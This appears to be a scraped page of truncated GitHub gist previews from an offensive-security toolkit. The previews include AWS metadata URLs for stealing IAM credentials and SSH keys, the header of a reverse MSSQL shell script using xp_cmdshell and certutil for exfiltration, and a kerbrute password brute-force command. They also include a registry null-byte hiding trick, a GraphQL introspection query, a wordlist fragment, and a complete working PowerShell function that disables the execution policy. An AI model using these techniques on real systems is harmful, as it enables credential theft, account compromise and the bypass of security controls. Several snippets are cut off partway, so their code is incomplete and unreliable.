# set http proxy
export http_proxy=http://PROXYHOST:PROXYPORT
# set http proxy with user and password
export http_proxy=http://USERNAME:PASSWORD@PROXYHOST:PROXYPORT
# set http proxy with user and password (with special characters)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys | |
import requests | |
import threading | |
import HTMLParser | |
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler | |
''' | |
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration | |
Author: @xassiz | |
''' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: b0yd @rwincey | |
# Website: securifera.com | |
# | |
# Setup: | |
# ------------------------------------------------- | |
# pip install selenium | |
# wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb | |
# google-chrome-stable --version | |
# Vist http://chromedriver.chromium.org/downloads to identity the right version | |
# wget https://chromedriver.storage.googleapis.com/72.0.3626.69/chromedriver_linux64.zip |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import requests | |
try: | |
read_file = open(input("Enter path of the file containing subdomains: "),'r') | |
for host in read_file: | |
domain = host.rstrip("\n") | |
try: |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from Microsoft.Win32 import Registry | |
from time import sleep | |
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest") | |
rkey.SetValue(u'\x00 this is a test',u'\x00look at me!') | |
rkey.Close() | |
rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest") | |
values = rkey.GetValueNames() | |
print("We have {0} values.".format(str(len(values)))) | |
print("The value names returned are: {0}.".format(values[0])) | |
value = rkey.GetValue(u'\x00 this is a test') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
query%20IntrospectionQuery%20%7B%0A%20%20%20%20__schema%20%7B%0A%20%20%20%20%20%20queryType%20%7B%20name%20%7D%0A%20%20%20%20%20%20mutationType%20%7B%20name%20%7D%0A%20%20%20%20%20%20types%20%7B%0A%20%20%20%20%20%20%20%20...FullType%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20directives%20%7B%0A%20%20%20%20%20%20%20%20name%0A%20%20%20%20%20%20%20%20description%0A%20%20%20%20%20%20%20%20locations%0A%20%20%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%7D%0A%20%20%7D%0A%20%20fragment%20FullType%20on%20__Type%20%7B%0A%20%20%20%20kind%0A%20%20%20%20name%0A%20%20%20%20description%0A%20%20%20%20fields%28includeDeprecated%3A%20true%29%20%7B%0A%20%20%20%20%20%20name%0A%20%20%20%20%20%20description%0A%20%20%20%20%20%20args%20%7B%0A%20%20%20%20%20%20%20%20...InputValue%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20type%20%7B%0A%20%20%20%20%20%20%20%20...TypeRef%0A%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20isDeprecated%0A%20%20% |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0 | |
00 | |
01 | |
02 | |
03 | |
1 | |
1.0 | |
10 | |
100 | |
1000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# from https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/ | |
function Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue($ctx, (new-object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell"))} | |
Disable-ExecutionPolicy |